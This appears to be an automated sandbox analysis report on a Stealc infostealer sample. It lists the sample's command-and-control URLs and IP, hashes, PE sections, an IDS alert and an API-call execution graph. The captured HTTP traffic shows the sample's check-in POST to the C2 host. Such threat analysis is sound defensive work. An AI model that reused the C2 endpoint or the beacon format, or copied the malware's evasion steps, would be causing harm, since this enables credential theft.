http://185.215.113.206/_ | file.exe, 00000000.00000002.2236827089.00000000011E9000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.php/ | file.exe, 00000000.00000002.2236827089.0000000001205000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.php5IfH | file.exe, 00000000.00000002.2236827089.0000000001205000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206 | file.exe, 00000000.00000002.2236827089.000000000118E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2236827089.00000000011D2000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.phpt | file.exe, 00000000.00000002.2236827089.000000000118E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/I | file.exe, 00000000.00000002.2236827089.00000000011E9000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/h | file.exe, 00000000.00000002.2236827089.00000000011E9000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/YIzH | file.exe, 00000000.00000002.2236827089.0000000001205000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1560591
Start date and time: 2024-11-22 01:01:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 48s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 18
• Number of non-executed functions: 119
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com
• Report size getting too big, too many NtQueryValueKey calls found.
                                No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.206 | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
 | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206/
 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/68b591d6548ec281/sqlite3.dll
 | file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
                                No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206
 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206
 | file.exe | malicious | LummaC | 185.215.113.16
 | file.exe | malicious | LummaC | 185.215.113.16
 | file.exe | malicious | Stealc | 185.215.113.206
 | file.exe | malicious | Amadey, XWorm | 185.215.113.43
 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206
 | file.exe | malicious | Stealc | 185.215.113.206
 | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206
 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206
                                No context
                                No context
                                No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.9457252384276105
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'799'168 bytes
MD5: 7f133608117d2d14e36a7b73d6c173af
SHA1: b0d7ad4e7b66129b16512761d4a86303b5928a81
SHA256: 3806b9f4eb73630796343fa069a80fc29705bd31f719ab9ad8841a17f225b8c4
SHA512: 1434642cfce942003bce803deba580aff7f420a1c0868ff43b6c891039568b6513667f4c14ec421c37dbcb8a7e3b9b3c9c256beed476cc1099f396d9bd5ae90e
SSDEEP: 49152:anx5e/w4qYaUEHrsqpiUIcHfHfgJQrLo+MwudQ:axcwUavHrsqNIcHfYJG1uS
TLSH: 9A8533A5AF6D68BCCBAD22F4C5F746AC30159F531C835FFB278D6AA58423426523390C
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
Icon Hash: 00928e8e8686b000
Entrypoint: 0xa93000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                                Instruction
                                jmp 00007FBF64DBE07Ah
                                rsqrtps xmm3, dqword ptr [ebx]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add cl, ch
                                add byte ptr [eax], ah
                                add byte ptr [eax], al
                                add byte ptr [edi], al
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], dh
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add al, 00h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [edi], al
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [ecx], al
                                add byte ptr [eax], 00000000h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add cl, byte ptr [edx]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319
                                Data directories (Name | Virtual Address | Virtual Size | Is in Section):
                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24b04d | 0x61 | .idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24a000 | 0x1ac | .rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24b1f8 | 0x8 | .idata
                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
                                IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | -
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
                                Sections (Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics):
                                (unnamed) | 0x1000 | 0x249000 | 0x16200 | cea3532d3ed38884aa27d5f225bc4f94 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc | 0x24a000 | 0x1ac | 0x200 | c1e63df86005f995382478d67f49befe | False | 0.580078125 | data | 4.53896021780146 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .idata | 0x24b000 | 0x1000 | 0x200 | 0d0399d83a742d5d86c5718841e8e842 | False | 0.134765625 | data | 0.8646718654202081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                (unnamed) | 0x24c000 | 0x2a8000 | 0x200 | d26c997ddab76051e245abab38aaf71b | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                tlwqldfy | 0x4f4000 | 0x19e000 | 0x19d600 | 0617375298944b055391135b1507d256 | False | 0.9948204093589356 | data | 7.954230564423373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                yxhtoyxo | 0x692000 | 0x1000 | 0x400 | d955a26e52bba2aed5331f09222c20c1 | False | 0.80859375 | data | 6.332395039142567 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .taggant | 0x693000 | 0x3000 | 0x2200 | 71eda8790a3fb1bb25b6cb7a0f4a5053 | False | 0.06043198529411765 | DOS executable (COM) | 0.7951683213729465 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                Resources (Name | RVA | Size | Type | Language | Country | ZLIB Complexity):
                                RT_MANIFEST | 0x691448 | 0x152 | ASCII text, with CRLF line terminators | - | - | 0.6479289940828402
                                Imports (DLL | Import):
                                kernel32.dll | lstrcpy
                                IDS alerts (Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol):
                                2024-11-22T01:02:14.488656+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.6 | 49717 | 185.215.113.206 | 80 | TCP
                                TCP packets (Timestamp | Source Port | Dest Port | Source IP | Dest IP):
                                Nov 22, 2024 01:02:12.516822100 CET | 49717 | 80 | 192.168.2.6 | 185.215.113.206
                                Nov 22, 2024 01:02:12.636511087 CET | 80 | 49717 | 185.215.113.206 | 192.168.2.6
                                Nov 22, 2024 01:02:12.636600018 CET | 49717 | 80 | 192.168.2.6 | 185.215.113.206
                                Nov 22, 2024 01:02:12.637273073 CET | 49717 | 80 | 192.168.2.6 | 185.215.113.206
                                Nov 22, 2024 01:02:12.756809950 CET | 80 | 49717 | 185.215.113.206 | 192.168.2.6
                                Nov 22, 2024 01:02:14.029403925 CET | 80 | 49717 | 185.215.113.206 | 192.168.2.6
                                Nov 22, 2024 01:02:14.029479027 CET | 49717 | 80 | 192.168.2.6 | 185.215.113.206
                                Nov 22, 2024 01:02:14.033570051 CET | 49717 | 80 | 192.168.2.6 | 185.215.113.206
                                Nov 22, 2024 01:02:14.153141975 CET | 80 | 49717 | 185.215.113.206 | 192.168.2.6
                                Nov 22, 2024 01:02:14.488584995 CET | 80 | 49717 | 185.215.113.206 | 192.168.2.6
                                Nov 22, 2024 01:02:14.488656044 CET | 49717 | 80 | 192.168.2.6 | 185.215.113.206
                                Nov 22, 2024 01:02:17.308540106 CET | 49717 | 80 | 192.168.2.6 | 185.215.113.206
                                • 185.215.113.206
                                HTTP sessions (Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process):
                                0 | 192.168.2.6 | 49717 | 185.215.113.206 | 80 | 404 | C:\Users\user\Desktop\file.exe
                                HTTP traffic (Timestamp | Bytes transferred | Direction | Data):
                                Nov 22, 2024 01:02:12.637273073 CET | 90 | OUT | GET / HTTP/1.1
                                Host: 185.215.113.206
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Nov 22, 2024 01:02:14.029403925 CET | 203 | IN | HTTP/1.1 200 OK
                                Date: Fri, 22 Nov 2024 00:02:13 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 0
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Nov 22, 2024 01:02:14.033570051 CET | 413 | OUT | POST /c4becf79229cb002.php HTTP/1.1
                                Content-Type: multipart/form-data; boundary=----KFCBAEHCAEGDHJKFHJKF
                                Host: 185.215.113.206
                                Content-Length: 211
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 30 32 33 37 38 39 35 39 38 31 36 32 32 33 35 37 33 34 35 32 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 2d 2d 0d 0a
                                Data Ascii: ------KFCBAEHCAEGDHJKFHJKFContent-Disposition: form-data; name="hwid"2023789598162235734526------KFCBAEHCAEGDHJKFHJKFContent-Disposition: form-data; name="build"mars------KFCBAEHCAEGDHJKFHJKF--
                                Nov 22, 2024 01:02:14.488584995 CET | 210 | IN | HTTP/1.1 200 OK
                                Date: Fri, 22 Nov 2024 00:02:14 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 8
                                Keep-Alive: timeout=5, max=99
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 59 6d 78 76 59 32 73 3d
                                Data Ascii: YmxvY2s=



                                Target ID: 0
                                Start time: 19:02:08
                                Start date: 21/11/2024
                                Path: C:\Users\user\Desktop\file.exe
                                Wow64 process (32bit): true
                                Commandline: "C:\Users\user\Desktop\file.exe"
                                Imagebase: 0x3e0000
                                File size: 1'799'168 bytes
                                MD5 hash: 7F133608117D2D14E36A7B73D6C173AF
                                Has elevated privileges: true
                                Has administrator privileges: true
                                Programmed in: C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2236827089.000000000118E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2186915935.0000000004A90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation: low
                                Has exited: true


                                  Execution Graph

                                  Execution Coverage: 5%
                                  Dynamic/Decrypted Code Coverage: 0%
                                  Signature Coverage: 16.3%
                                  Total number of Nodes: 1403
                                  Total number of Limit Nodes: 28
                                  execution_graph 27116 403cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27153 4033c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27135 3ef639 144 API calls 27138 3e16b9 200 API calls 27141 3ebf39 177 API calls 27154 3fabb2 120 API calls 27117 402cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27106 402853 lstrcpy 27142 3f4b29 304 API calls 27155 3f23a9 298 API calls 27128 402d60 11 API calls 27143 402b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 27156 3f8615 47 API calls 27118 3f2499 290 API calls 27157 3edb99 672 API calls 25669 401bf0 25721 3e2a90 25669->25721 25673 401c03 25674 401c29 lstrcpy 25673->25674 25675 401c35 25673->25675 25674->25675 25676 401c65 ExitProcess 25675->25676 25677 401c6d GetSystemInfo 25675->25677 25678 401c85 25677->25678 25679 401c7d ExitProcess 25677->25679 25822 3e1030 GetCurrentProcess VirtualAllocExNuma 25678->25822 25684 401ca2 25685 401cb8 25684->25685 25686 401cb0 ExitProcess 25684->25686 25834 402ad0 GetProcessHeap RtlAllocateHeap GetComputerNameA 25685->25834 25688 401ce7 lstrlen 25693 401cff 25688->25693 25689 401cbd 25689->25688 26043 402a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25689->26043 25691 401cd1 25691->25688 25696 401ce0 ExitProcess 25691->25696 25692 401d23 lstrlen 25694 401d39 25692->25694 25693->25692 25695 401d13 lstrcpy lstrcat 25693->25695 25697 401d5a 25694->25697 25698 401d46 lstrcpy lstrcat 25694->25698 25695->25692 25699 402ad0 3 API calls 25697->25699 25698->25697 25700 401d5f lstrlen 25699->25700 25703 401d74 25700->25703 25701 401d9a lstrlen 25702 401db0 25701->25702 25705 401dce 25702->25705 25706 401dba lstrcpy lstrcat 25702->25706 25703->25701 25704 401d87 lstrcpy lstrcat 25703->25704 25704->25701 25836 402a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25705->25836 25706->25705 25708 401dd3 lstrlen 25709 401de7 25708->25709 25710 401df7 lstrcpy lstrcat 25709->25710 25711 401e0a 25709->25711 25710->25711 25712 401e28 lstrcpy 
25711->25712 25713 401e30 25711->25713 25712->25713 25714 401e56 OpenEventA 25713->25714 25715 401e68 CloseHandle Sleep OpenEventA 25714->25715 25716 401e8c CreateEventA 25714->25716 25715->25715 25715->25716 25837 401b20 GetSystemTime 25716->25837 25720 401ea5 CloseHandle ExitProcess 26044 3e4a60 25721->26044 25723 3e2aa1 25724 3e4a60 2 API calls 25723->25724 25725 3e2ab7 25724->25725 25726 3e4a60 2 API calls 25725->25726 25727 3e2acd 25726->25727 25728 3e4a60 2 API calls 25727->25728 25729 3e2ae3 25728->25729 25730 3e4a60 2 API calls 25729->25730 25731 3e2af9 25730->25731 25732 3e4a60 2 API calls 25731->25732 25733 3e2b0f 25732->25733 25734 3e4a60 2 API calls 25733->25734 25735 3e2b28 25734->25735 25736 3e4a60 2 API calls 25735->25736 25737 3e2b3e 25736->25737 25738 3e4a60 2 API calls 25737->25738 25739 3e2b54 25738->25739 25740 3e4a60 2 API calls 25739->25740 25741 3e2b6a 25740->25741 25742 3e4a60 2 API calls 25741->25742 25743 3e2b80 25742->25743 25744 3e4a60 2 API calls 25743->25744 25745 3e2b96 25744->25745 25746 3e4a60 2 API calls 25745->25746 25747 3e2baf 25746->25747 25748 3e4a60 2 API calls 25747->25748 25749 3e2bc5 25748->25749 25750 3e4a60 2 API calls 25749->25750 25751 3e2bdb 25750->25751 25752 3e4a60 2 API calls 25751->25752 25753 3e2bf1 25752->25753 25754 3e4a60 2 API calls 25753->25754 25755 3e2c07 25754->25755 25756 3e4a60 2 API calls 25755->25756 25757 3e2c1d 25756->25757 25758 3e4a60 2 API calls 25757->25758 25759 3e2c36 25758->25759 25760 3e4a60 2 API calls 25759->25760 25761 3e2c4c 25760->25761 25762 3e4a60 2 API calls 25761->25762 25763 3e2c62 25762->25763 25764 3e4a60 2 API calls 25763->25764 25765 3e2c78 25764->25765 25766 3e4a60 2 API calls 25765->25766 25767 3e2c8e 25766->25767 25768 3e4a60 2 API calls 25767->25768 25769 3e2ca4 25768->25769 25770 3e4a60 2 API calls 25769->25770 25771 3e2cbd 25770->25771 25772 3e4a60 2 API calls 25771->25772 25773 3e2cd3 25772->25773 25774 3e4a60 2 API calls 25773->25774 25775 3e2ce9 25774->25775 25776 
3e4a60 2 API calls 25775->25776 25777 3e2cff 25776->25777 25778 3e4a60 2 API calls 25777->25778 25779 3e2d15 25778->25779 25780 3e4a60 2 API calls 25779->25780 25781 3e2d2b 25780->25781 25782 3e4a60 2 API calls 25781->25782 25783 3e2d44 25782->25783 25784 3e4a60 2 API calls 25783->25784 25785 3e2d5a 25784->25785 25786 3e4a60 2 API calls 25785->25786 25787 3e2d70 25786->25787 25788 3e4a60 2 API calls 25787->25788 25789 3e2d86 25788->25789 25790 3e4a60 2 API calls 25789->25790 25791 3e2d9c 25790->25791 25792 3e4a60 2 API calls 25791->25792 25793 3e2db2 25792->25793 25794 3e4a60 2 API calls 25793->25794 25795 3e2dcb 25794->25795 25796 3e4a60 2 API calls 25795->25796 25797 3e2de1 25796->25797 25798 3e4a60 2 API calls 25797->25798 25799 3e2df7 25798->25799 25800 3e4a60 2 API calls 25799->25800 25801 3e2e0d 25800->25801 25802 3e4a60 2 API calls 25801->25802 25803 3e2e23 25802->25803 25804 3e4a60 2 API calls 25803->25804 25805 3e2e39 25804->25805 25806 3e4a60 2 API calls 25805->25806 25807 3e2e52 25806->25807 25808 406390 GetPEB 25807->25808 25809 4065c3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 25808->25809 25812 4063c3 25808->25812 25810 406625 GetProcAddress 25809->25810 25811 406638 25809->25811 25810->25811 25813 406641 GetProcAddress GetProcAddress 25811->25813 25814 40666c 25811->25814 25817 4063d7 20 API calls 25812->25817 25813->25814 25815 406675 GetProcAddress 25814->25815 25816 406688 25814->25816 25815->25816 25818 406691 GetProcAddress 25816->25818 25819 4066a4 25816->25819 25817->25809 25818->25819 25820 4066d7 25819->25820 25821 4066ad GetProcAddress GetProcAddress 25819->25821 25820->25673 25821->25820 25823 3e105e VirtualAlloc 25822->25823 25824 3e1057 ExitProcess 25822->25824 25825 3e107d 25823->25825 25826 3e108a VirtualFree 25825->25826 25827 3e10b1 25825->25827 25826->25827 25828 3e10c0 25827->25828 25829 3e10d0 GlobalMemoryStatusEx 25828->25829 25831 3e10f5 25829->25831 25832 3e1112 ExitProcess 25829->25832 25831->25832 25833 
3e111a GetUserDefaultLangID 25831->25833 25833->25684 25833->25685 25835 402b24 25834->25835 25835->25689 25836->25708 26049 401820 25837->26049 25839 401b81 sscanf 26088 3e2a20 25839->26088 25842 401be9 25845 3fffd0 25842->25845 25843 401be2 ExitProcess 25844 401bd6 25844->25842 25844->25843 25846 3fffe0 25845->25846 25847 400019 lstrlen 25846->25847 25848 40000d lstrcpy 25846->25848 25849 4000d0 25847->25849 25848->25847 25850 4000e7 lstrlen 25849->25850 25851 4000db lstrcpy 25849->25851 25852 4000ff 25850->25852 25851->25850 25853 400116 lstrlen 25852->25853 25854 40010a lstrcpy 25852->25854 25855 40012e 25853->25855 25854->25853 25856 400145 25855->25856 25857 400139 lstrcpy 25855->25857 26090 401570 25856->26090 25857->25856 25860 40016e 25861 400183 lstrcpy 25860->25861 25862 40018f lstrlen 25860->25862 25861->25862 25863 4001a8 25862->25863 25864 4001c9 lstrlen 25863->25864 25865 4001bd lstrcpy 25863->25865 25866 4001e8 25864->25866 25865->25864 25867 400200 lstrcpy 25866->25867 25868 40020c lstrlen 25866->25868 25867->25868 25869 40026a 25868->25869 25870 400282 lstrcpy 25869->25870 25871 40028e 25869->25871 25870->25871 26100 3e2e70 25871->26100 25879 400540 25880 401570 4 API calls 25879->25880 25881 40054f 25880->25881 25882 4005a1 lstrlen 25881->25882 25883 400599 lstrcpy 25881->25883 25884 4005bf 25882->25884 25883->25882 25885 4005d1 lstrcpy lstrcat 25884->25885 25886 4005e9 25884->25886 25885->25886 25887 400614 25886->25887 25888 40060c lstrcpy 25886->25888 25889 40061b lstrlen 25887->25889 25888->25887 25890 400636 25889->25890 25891 40064a lstrcpy lstrcat 25890->25891 25892 400662 25890->25892 25891->25892 25893 400687 25892->25893 25894 40067f lstrcpy 25892->25894 25895 40068e lstrlen 25893->25895 25894->25893 25896 4006b3 25895->25896 25897 4006c7 lstrcpy lstrcat 25896->25897 25898 4006db 25896->25898 25897->25898 25899 400704 lstrcpy 25898->25899 25900 40070c 25898->25900 25899->25900 25901 400751 25900->25901 25902 400749 lstrcpy 25900->25902 
26856 402740 GetWindowsDirectoryA 25901->26856 25902->25901 25904 400785 26865 3e4c50 25904->26865 25905 40075d 25905->25904 25906 40077d lstrcpy 25905->25906 25906->25904 25908 40078f 27019 3f8ca0 StrCmpCA 25908->27019 25910 40079b 25911 3e1530 8 API calls 25910->25911 25912 4007bc 25911->25912 25913 4007e5 lstrcpy 25912->25913 25914 4007ed 25912->25914 25913->25914 27037 3e60d0 80 API calls 25914->27037 25916 4007fa 27038 3f81b0 10 API calls 25916->27038 25918 400809 25919 3e1530 8 API calls 25918->25919 25920 40082f 25919->25920 25921 400856 lstrcpy 25920->25921 25922 40085e 25920->25922 25921->25922 27039 3e60d0 80 API calls 25922->27039 25924 40086b 27040 3f7ee0 lstrlen lstrcpy StrCmpCA StrCmpCA StrCmpCA 25924->27040 25926 400876 25927 3e1530 8 API calls 25926->25927 25928 4008a1 25927->25928 25929 4008d5 25928->25929 25930 4008c9 lstrcpy 25928->25930 27041 3e60d0 80 API calls 25929->27041 25930->25929 25932 4008db 27042 3f8050 lstrlen lstrcpy StrCmpCA lstrlen lstrcpy 25932->27042 25934 4008e6 25935 3e1530 8 API calls 25934->25935 25936 4008f7 25935->25936 25937 400926 lstrcpy 25936->25937 25938 40092e 25936->25938 25937->25938 27043 3e5640 8 API calls 25938->27043 25940 400933 25941 3e1530 8 API calls 25940->25941 25942 40094c 25941->25942 27044 3f7280 1499 API calls 25942->27044 25944 40099f 25945 3e1530 8 API calls 25944->25945 25946 4009cf 25945->25946 25947 4009f6 lstrcpy 25946->25947 25948 4009fe 25946->25948 25947->25948 27045 3e60d0 80 API calls 25948->27045 25950 400a0b 27046 3f83e0 7 API calls 25950->27046 25952 400a18 25953 3e1530 8 API calls 25952->25953 25954 400a29 25953->25954 27047 3e24e0 230 API calls 25954->27047 25956 400a6b 25957 400b40 25956->25957 25958 400a7f 25956->25958 25960 3e1530 8 API calls 25957->25960 25959 3e1530 8 API calls 25958->25959 25961 400aa5 25959->25961 25962 400b59 